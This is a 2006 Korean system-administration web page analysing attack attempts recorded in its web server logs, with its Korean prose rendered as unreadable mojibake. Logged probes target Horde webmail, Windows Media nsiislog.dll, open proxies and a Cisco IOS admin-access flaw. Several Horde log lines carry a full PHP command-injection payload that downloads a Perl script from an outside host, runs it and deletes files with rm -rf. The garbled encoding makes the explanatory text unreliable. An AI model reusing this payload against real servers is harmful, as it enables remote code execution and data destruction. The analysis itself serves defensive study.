Ä¿ÇÇÇâÀÌ ³ª´Â *NIX
Ä¿ÇǴнº
½Ã½ºÅÛ/³×Æ®¿÷/º¸¾ÈÀ» ´Ù·ç´Â °÷
*
HanIRCÀÇ #coffeenix ¹æ
[
Àåºñ ¹× ȸ¼± ÈÄ¿ø
]
> Forum <
IT ÀÏÁ¤
N
e
w
!
ÀÚµ¿È ÇÁ·ÎÁ§Æ®
HOME
>
³×Æ®¿öÅ©(network)
>
À¥ ¼¹ö(web, httpd, apache)
µµ¿ò¸»
°Ë»ö :
»çÀÌÆ®
WHOIS
À¥¼¹ö Á¾·ù
WebDAV
(7, ±Û 1, ÀÚ·á 4)
À¥¼¹ö Æ©´×
(5, ±Û 4, ÀÚ·á 2)
À¥¼¹ö »ç¿ë Åë°è ÀÚ·á
(2, ÀÚ·á 1)
Apache SSL / mod_ssl
(4, ±Û 3, ÀÚ·á 2)
À¥°ø°Ý¿¡ ´ëÇÑ À¥·Î±×µé 2¹ø°
ÀÛ¼ºÀÏ : 2006/10/17 20:19
±Û¾´ÀÌ : ÁÁÀºÁøÈ£ (
http://coffeenix.net/
)
Á¶È¸¼ö : 9204
[
ÀÌÀüȸé
/
¼öÁ¤
] ºñ¹Ð¹øÈ£ :
Á¦ ¸ñ : À¥°ø°Ý¿¡ ´ëÇÑ À¥·Î±×µé 2¹ø°
ÀÛ¼ºÀÚ : ÁÁÀºÁøÈ£(truefeel,
http://coffeenix.net/
)
ÀÛ¼ºÀÏ : 2006.5.25(¸ñ)~
Á¤¸®ÀÏ : 2006.9.18(¿ù)
'À¥°ø°Ý¿¡ ´ëÇÑ À¥·Î±×µé'¿¡ ÀÌÀº 2¹ø° À¥·Î±× ºÐ¼®(?) °á°úÀÌ´Ù. ³Ê¹«³ªµµ ¸¹Àº À¯ÇüÀÇ À¥°ø°Ý ·Î±×°¡
±×µ¿¾È ³²¾ÒÁö¸¸ ¸íÈ®ÇÏ°Ô ºÐ¼®Çϱâ Èûµç(°ü·Ã ÀڷḦ ã¾Æº¼ ¼ö ¾ø´Â) »óȲÀÌ´Ù. ÀÌ·± ½ÃÁ¡¿¡
¸ðµç ·Î±×¸¦ ºÐ¼® Á¤¸®ÇÏ´Â °ÍÀº ºÒ°¡´ÉÇÑ °ÍÀº ´ç¿¬ÇÏ°í, ´õ ¸¹Àº ºÐ¼® °á°ú¸¦ Á¦°øÇÏ·Á°í ÇÏ´Ù°¡´Â
³Ê¹«³ª ½ÃÁ¡ÀÌ ´Ê¾îÁú °Í °°¾Æ ÀÏºÎ¶óµµ Á¤¸®Çß´Ù. ±âÁ¸¿¡ ±â·ÏµÈ ·Î±×Áß ¾î¶² °ø°Ý½ÃµµÀÎÁö ÆľÇÀÌ
µÇ¸é À̱ۿ¡ Ãß°¡Çϵµ·Ï ÇÏ°Ú´Ù.
À¥°ø°ÝÀÌ ÀÖÀ» ¶§ ½ÇÁ¦ ÇØÅ·À» ´çÇßÀ» °¡´É¼º ¿©ºÎ´Â ÀÌÀü¿¡ ½è´ø ±ÛÀ» Àо±â ¹Ù¶õ´Ù.
http://coffeenix.net/board_view.php?bd_code=1352
¡Ø ÀÌ ±Û ¸¸ÅÀº MSIE¿¡¼ Å×À̺íÀÌ °¡Àå Àß Ç¥½ÃµË´Ï´Ù.
1. ½Ã½ºÅÛ ¸ð´ÏÅ͸µ Åø What's UpÀÌ ³²±ä ·Î±×
210.xxx.xx.xxx - - [19/Apr/2006:17:20:25 +0900] "HEAD / HTTP/1.0" 200 - "WhatsUp Professional/1.0"
210.xxx.xx.xxx - - [19/Apr/2006:17:35:33 +0900] "HEAD / HTTP/1.0" 200 - "WhatsUp Professional/1.0"
- À©µµ±â¹ÝÀÇ »ó¿ë ¸ð´ÏÅ͸µ ÅøÀÎ What's UpÀÌ À¥¼¹ö°¡ »ì¾ÆÀÖ´ÂÁö üũÇϱâ À§ÇØ Á¢¼ÓÇÑ ·Î±×ÀÌ´Ù.
Âü°íÀÚ·á :
* WhatsUp ȨÆäÀÌÁö
http://www.ipswitch.com/products/whatsup/index.asp
2. ¿ÀǼҽº±â¹Ý À¥¸ÞÀÏ Horde Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý
201.219.7.xx - - [24/Apr/2006:00:08:53 +0900] "GET //README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:54 +0900] "GET /horde//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:54 +0900] "GET /horde2//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:55 +0900] "GET /horde3//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:55 +0900] "GET /horde-3.0.9//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:56 +0900] "GET /Horde//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:56 +0900] "GET /mail//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:57 +0900] "GET /webmail//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:58 +0900] "GET /horde-3.0.1//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:58 +0900] "GET /horde-3.0.2//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:59 +0900] "GET /horde-3.0.3//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:59 +0900] "GET /horde-3.0.4//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:09:00 +0900] "GET /horde-3.0.5//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:09:00 +0900] "GET /horde-3.0.6//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:09:01 +0900] "GET /horde-3.0.7//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:09:01 +0900] "GET /horde-3.0.8//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:30 +0900] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:30 +0900] "GET /horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:31 +0900] "GET /horde-cvs/horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:31 +0900] "GET /pub/horde-cvs/horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:35 +0900] "GET /horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:36 +0900] "GET /pub/horde-cvs/horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
196.40.xx.xxx - - [23/Jun/2006:02:05:37 +0900] "GET /horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
196.40.xx.xxx - - [23/Jun/2006:02:05:38 +0900] "GET /services/help/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
196.40.xx.xxx - - [23/Jun/2006:02:05:38 +0900] "GET /horde-cvs/horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
196.40.xx.xxx - - [23/Jun/2006:02:05:39 +0900] "GET /pub/horde-cvs/horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
- IP : ¿¡Äâµµ¸£ (RC, 201.219.7.0/24)
¹Ì±¹ (216.65.0.0 - 216.65.127.255)
ÄÚ½ºÅ¸¸®Ä«(CR, 196.40.85.128/25)
Âü°í ÀÚ·á :
3. À©µµ ¹Ìµð¼ ¼ºñ½º ISAPI nsiislog.dll POST ¿À¹öÇ÷οì Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý
202.100.xxx.xxx - - [24/Apr/2006:11:53:13 +0900] "GET /scripts/nsiislog.dll" 404 - "-"
202.100.xxx.xxx - - [24/Apr/2006:11:53:54 +0900] "GET /scripts/nsiislog.dll" 404 - "-"
- IP : Áß±¹(CN, 202.100.96.0 - 202.100.127.255)
- 2003³â 6¿ù¿¡ ³ª¿Â Ãë¾àÁ¡À̸ç, Windows 2000¼¹ö¿¡ ÇØ´çµÈ´Ù.
80Æ÷Æ®·Î 'GET /scripts/nsiislog.dll /HTTP/1.0' ¸¦ ¿äûÇßÀ» ¶§ ¼¹ö¿¡¼ 'NetShow ISAPI Log Dll'
°ªÀ» »Ñ·ÁÁشٸé Ãë¾àÁ¡ÀÌ ÀÖ´Â ½Ã½ºÅÛÀÌ´Ù.
Âü°íÀÚ·á :
* Microsoft Media Services ISAPI nsiislog.dll POST Overflow
http://www.osvdb.org/4535
* Windows Media Services Remote Command Execution #2
http://archives.neohapsis.com/archives/bugtraq/2003-06/0211.html
* Successful attack using MS03-022 vuln
http://lists.sans.org/pipermail/unisog/2003-September/022422.html
4. proxy_scanner ÅøÀ» ÀÌ¿ëÇÑ Proxy scanning ·Î±×
211.100.xx.xx - - [06/Jun/2006:21:17:38 +0900] "GET
http://check.211.xxx.xxx.xx.v.80.pdx8.super.proxy.scanner.ii.9966.org/Provy_OK.html
HTTP/1.1" 404 - "-"
61.135.xxx.xxx - - [06/Jun/2006:23:43:32 +0900] "GET
http://check.211.xxx.xxx.xx.v.80.PCN22.super.proxy.scanner.ii.9966.org/Provy_OK.html
HTTP/1.1" 404 - "-"
211.100.xx.xx - - [02/Jul/2006:09:37:52 +0900] "GET
http://check.211.xxx.xxx.xx.v.80.pdx8.super.proxy.scanner.ii.9966.org/Provy_OK.html
HTTP/1.1" 404 - "-"
- IP : Áß±¹ (CN, 211.100.32.0 - 211.100.95.255)
Áß±¹ (CN, 61.135.0.0 - 61.135.255.255)
- 2004³â¿¡ Áß±¹ ÇØÄ¿¿¡ ÀÇÇØ ¸±¸®ÁîµÈ Proxy Scanning Åø 'proxy_scanner'À» ÀÌ¿ëÇؼ Proxy »ç¿ë
°¡´É¿©ºÎ¸¦ È®ÀÎÇϱâ À§ÇÑ ¿äûÀÌ´Ù.
- URL ¿äû Çü½ÄÀº ´ÙÀ½°ú °°´Ù.
http://check.$ip_address.v.80.(pdx8|PCN22|mt1|pw1).super.proxy.scanner.(i.thu.cn|ii.9966.org)/Provy_OK.html
check...super.proxy.scanner.(i.thu.cn|ii.9966.org)ÀÇ È£½ºÆ®´Â ¸ðµÎ 61.135.170.153 IP·Î lookupµÇ´Â
°ÍÀ¸·Î º¸¾Æ ¸î¸î IP(DNSµî)¸¸ Á¦¿ÜÇÏ°í '* IN A 61.135.170.153'À¸·Î DNS ¼³Á¤µÇ¾î ÀÖ´Â °ÍÀ¸·Î º¸ÀδÙ.
- ÀÌ µé À¥¼¹ö´Â lighttpd/1.4.11À» »ç¿ëÇÑ´Ù. (80Æ÷Æ®·Î telnetÇؼ º¸¸é ½±°Ô È®ÀÎ °¡´É)
Âü°íÀÚ·á :
* What's a super.proxy.scanner and why is it in my logs?
http://isc.sans.org/diary.php?storyid=1298
* Proxy Probes
http://www.splunk.com/splunkbin/426
5. Cisco ISO HTTPÀ» ÅëÇØ admin ±ÇÇÑÀ» °®À» ¼ö ÀÖ´Â Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý
81.225.xx.xx - - [29/Aug/2006:13:23:45 +0900] "GET /level/16/exec/show%20conf HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; PMF Master V3.0)"
- IP : ½º¿þµ§(SE, 81.224.0.0 - 81.236.255.255)
- ÀÌÀü À¥·Î±× ºÐ¼® ±ÛÀÇ '14. Cisco SwitchÀÇ ¾ÆÁÖ ¿¹Àü HTTP Ãë¾àÁ¡(2001³â)À» ÀÌ¿ëÇÑ °ø°Ý'
Ç׸ñÀ» Âü°íÇϱ⠹ٶõ´Ù.
- ÀÌ Ãë¾àÁ¡Àº http://Switch_IP/level/$NUMBER/exec/.... URLÀ» ÀÌ¿ëÇؼ full admin±ÇÇÑÀ» °®À»
¼ö ÀÖÀ¸¸ç /level/$NUMBER/exec/... ¿¡¼ $NUMBER´Â 16¿¡¼ 99»çÀÇ ¼ýÀÚÀÌ´Ù.
- Cisco Global Exploiter¶ó´Â ÀÚµ¿ÈµÈ ÅøÀ» ÀÌ¿ëÇؼ CISCOÀÇ Ãë¾àÁ¡À» ½ºÄ³´×ÇÏ´Â ÅøÀÌ ÀÖ´Ù.
Âü°í ÀÚ·á :
* Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
http://www.securityfocus.com/bid/2936
* Multiple Cisco Exploit Codes
http://www.securiteam.com/exploits/5OP0L1FCAE.html
http://downloads.securityfocus.com/vulnerabilities/exploits/ciscoMultipleVulnsExploit.pl
Ä¿ÇǴнº Ä«Æä ÃÖ±Ù ±Û
[03/24]
Youtube òÁ
[03/20]
Re: ¿Â¶óÀΰÔÀÓÀÇ Á¾ÁÖ±¹ ´ëÇѹα¹
[03/20]
½ÇÁ¦
[03/18]
±¹°¡
[10/20]
Cross Compiler ±ò
[07/14]
SSL ¬¡¬°
[04/26]
Re: µµ½ºÈ¸é ¿ø°ÝÁ¶Á¾ ¿©ºÎ
[04/25]
µµ½ºÈ¸é ¿ø°ÝÁ¶Á¾ ¿©ºÎ
[10/30]
Cshell¿¡¼ ³¼ö ¼³Á¤
[10/23]
°øÇ×öµµÁÖ½Äȸ»ç SE ±¸ÀÎ Ëì
[01/26]
Re: wgetÀ¸·Î ´Ù¸¥¼¹ö¿¡ÀÖ´Â µð·ºÅ丮¸¦ °¡Á®¿À·Á°íÇÕ´Ï´Ù.
[01/25]
wgetÀ¸·Î ´Ù¸¥¼¹ö¿¡ÀÖ´Â µð·ºÅ丮¸¦ °¡Á®¿À·Á°íÇÕ´Ï´Ù.
[01/11]
ƯÁ¤ ¾Èµå·ÎÀ̵å WebView ¹öÀü¿¡¼ SSL ¹®Á¦ (WebView ¹ö±×)
[08/01]
DNS forwarder (Àü´ÞÀÚ) ¼¹ö¸¦ ÅëÇؼ Äõ¸®ÇÏ¸é ¿ª¹æÇâÀ» ¹Þ¾Æ¿ÀÁú ¸øÇÕ´Ï´Ù.
[05/16]
(ÁÖ)ÈÄÀÌÁî ½Ã½ºÅÛ¿£Áö´Ï¾î (°æ·ÂÀÚ) ¸ðÁý
N
e
w
! ÃÖ±Ù¿¡ µî·ÏÇÑ ÆäÀÌÁö
KiCad EDA Suite project (Free/Libre/Open-Source EDA Suite) (CAD)
¿ÀÇÂij½ºÄÉÀ̵å ijµå (OpenCASCADE CAD)
QCad for Windows --- GNU GPL (Free Software)
The Hello World Collection
IPMI¸¦ È°¿ëÇÑ ¸®´ª½º ¼¹ö°ü¸®
DNS ¼³Á¤ °Ë»ç
nagiosgraph ¼³Ä¡ ¹æ¹ý
Slony-I ¼³Ä¡ ¹æ¹ý (postgresql replication tool)
Qmail±â¹ÝÀÇ Anti spam ½Ã½ºÅÛ ±¸ÃàÇϱâ
clusterssh
[ ÇÔ²²ÇÏ´Â »çÀÌÆ® ]
¿î¿µÁø :
ÁÁÀºÁøÈ£(truefeel)
, ¾ß¼ö(yasu), ¹ü³ÃÀÌ, sCag
2003³â 8¿ù 4ÀÏ~